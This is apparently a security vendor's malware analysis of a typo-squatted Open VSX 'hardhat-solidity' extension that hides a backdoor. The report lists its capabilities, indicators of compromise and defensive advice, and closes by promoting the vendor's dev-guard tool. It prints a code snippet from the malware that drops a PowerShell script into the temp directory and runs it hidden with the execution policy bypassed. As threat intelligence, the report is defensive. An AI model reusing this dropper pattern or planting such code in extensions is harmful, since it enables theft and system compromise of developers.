WhiteCobra Beginnings

Background

Because Microsoft restricts non-Microsoft builds of Visual Studio Code from using its proprietary extension marketplace, forks such as Cursor, VSCodium, Windsurf, and Gitpod rely on Open VSX, a community-run registry operated by the Eclipse Foundation that lacks Microsoft's vetting, code signing, impersonation checks, publisher badges, and dynamic malware scanning.

That gap isn't theoretical. In July 2025, a malicious "Solidity Language" extension on the Open VSX registry was used to quietly install remote access trojans (RATs) and credential-stealing malware through the Cursor IDE and drained roughly $500,000 worth of cryptocurrency from a single developer. Inflated download counts and manipulated search rankings made it appear more legitimate than the genuine plugin, and the victim had no idea until it was too late.

One technique these threat actors commonly use is typo-squatting: publishing extensions under names or publisher IDs that are common misspellings of legitimate ones. A single mistyped search can expose a developer to theft of funds, data exfiltration, or full system compromise.

To fight this, the Yeeth Security group built an extension scanning pipeline and the dev-guard extension as a proof of concept. dev-guard is designed to be actively updated to alert on new threats in extension registries, warning developers before a malicious extension can harm the wider community. This is just the beginning of the wider tooling that can be built to support and protect developers from these threats.

What follows is a case study of a malicious extension detected by the dev-guard scanners: an example of how easily threat actors can compromise a system from a single click in the Cursor extension marketplace.

Summary

On August 29, 2025, Yeeth Security's automated scanners flagged a malicious extension uploaded to the Open VSX registry. The scanner reported that the extension performed unauthorized code execution and contained command-and-control (C2) communication capabilities. Manual analysis confirmed that the extension is a backdoor.

Description

The extension NomcFoundation.hardhat-solidity-1.2.5.vsx contains the malicious file Optimizer.js under the /out/network directory. The publisher namespace NomcFoundation typo-squats NomicFoundation, the legitimate publisher of the Hardhat Solidity extension. While most of the files in the package behave normally, Optimizer.js functions as a backdoor that collects system information, communicates with a C2 server, and executes shellcode via process injection. The backdoor is written to run on either Windows or macOS.

Capabilities

Process Injection: Uses Windows Early Bird injection (the payload is written into a newly created, suspended process and queued as an APC before its main thread runs) to inject and execute a payload inside werfault.exe.

PowerShell Execution: Generates and executes a PowerShell script (hardhat-optimize.ps1) that is responsible for the process injection and payload execution. The file is deleted after a 10 second delay. The following snippet shows the temporary file creation and PowerShell execution (the injection routine itself is not reproduced in this snippet):

const os = require('os');                        // temp directory lookup
const fs = require('fs');                        // script drop
const path = require('path');
const child_process = require('child_process');  // PowerShell launch

// Launch target: werfault.exe, a signed Windows binary used as the injection host
const targetProcess = "C:\\Windows\\System32\\werfault.exe";
// Script body: start the host process hidden, pause, then kill it
const psScript = ` $process = Start-Process -FilePath "${targetProcess}" -ArgumentList "-u -p" -PassThru -WindowStyle Hidden
Start-Sleep -Milliseconds 500
Start-Sleep -Milliseconds 1000
$process | Stop-Process -Force
`;
// The script is dropped into the user's temp directory under a benign-looking name
const tempScript = path.join(os.tmpdir(), `hardhat-optimize.ps1`);
fs.writeFileSync(tempScript, psScript);
// Executed with the execution policy bypassed and the console window hidden
child_process.exec(`powershell -ExecutionPolicy Bypass -File "${tempScript}"`, {
    windowsHide: true
}, () => { });

System Telemetry Collection: Gathers system information, including the operating system, architecture, total memory, CPU count, and system uptime.

Encrypted Command and Control (C2) Traffic: Decrypts the C2 domain with a hard-coded XOR key and sends collected data to the /api/telemetry path on that domain. A dynamic key may also be derived for C2 communication by hashing a seed composed of the string "hardhat-network-", the system hostname, and a timestamp.

Host-Based Indicators

File Hashes

  • Extension
    MD5: 129432CA4BE6A26A3F05FB47AF744A7C
    SHA-256: 1CAA42136007D6C1ED479A759965F5AEBA64FC79C28BF9D5F42CD3EBF9E4C40E
    Name: NomcFoundation.hardhat-solidity-1.2.5

  • Malicious Javascript
    MD5: 1BF898D9C6B4F6642600C45A0DD15750
    SHA-256: 3DDBBC25F1F8BA6C7A49F42971DC0DEC3CD43F2A4C8F2757A7697BF2FF70C9CA

Verification Keys

Windows

  • [0, 170, 6, 48, 142, 49, 188, 137, 187, 115, 123, 119, 18, 120, 175, 117, 98, 126, 68, 241, 199, 101, 47, 46, 120, 171, 105, 215, 98, 111, 59, 65]
  • [92, 114, 67, 86, 145, 18, 203, 25, 54, 16, 213, 146, 133, 149, 86, 158, 131, 162, 65, 92, 240, 92, 226, 3, 165, 99, 107, 118, 161, 88, 55, 211]
  • [149, 94, 246, 38, 124, 222, 214, 73, 107, 157, 204, 25, 134, 50, 123, 19, 98, 154, 117, 147, 203, 37, 17, 12, 143, 251, 248, 225, 150, 82, 81, 57]

MacOS

  • [0, 170, 6, 48, 142, 49, 188, 137, 187, 115, 123, 119, 18, 120, 175, 117, 98, 126, 68, 241, 199, 101, 47, 46, 120, 171, 105, 215, 98, 111, 59, 65]
  • [92, 114, 67, 86, 145, 18, 203, 25, 54, 16, 213, 146, 133, 149, 86, 158, 131, 162, 65, 92, 240, 92, 226, 3, 165, 99, 107, 118, 161, 88, 55, 211]
  • [149, 94, 246, 38, 124, 222, 214, 73, 107, 157, 204, 25, 134, 50, 123, 19, 98, 154, 117, 147, 203, 37, 17, 12, 143, 251, 248, 225, 150, 82, 81, 57]

Network-Based Indicators

  • Encrypted Domain: 0x8d, 0x9e, 0xaf, 0xb0, 0xc1, 0xd2, 0xe3, 0xf4, 0x05, 0x16, 0x27, 0x38, 0x49, 0x5a, 0x6b, 0x7c
    • XOR Key: 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6a, 0x6b, 0x6c, 0x6d, 0x6e, 0x6f, 0x70
  • User-Agent: Hardhat-Solidity-Extension/1.2.4 (note that the version string lags the package version 1.2.5)

Recommendations

Ensure your endpoint detection and response (EDR) tooling is not only updated with the indicators in this report but also tuned to flag behaviours common to malicious extensions: a development tool spawning PowerShell or a shell, scripts dropped into the temp directory, unusual outbound traffic, credential access, or persistence mechanisms. Because hashes and domains change between variants, regular validation of detection rules and proactive threat hunting are needed to catch samples that evolve beyond the known indicators.

Defense shouldn't stop there: the dev-guard extension, built and maintained by the Yeeth Security team, adds a layer of protection for VS Code and Cursor users. By continuously monitoring new campaigns and pushing live updates, dev-guard helps shut down these threats before they spread across the developer community.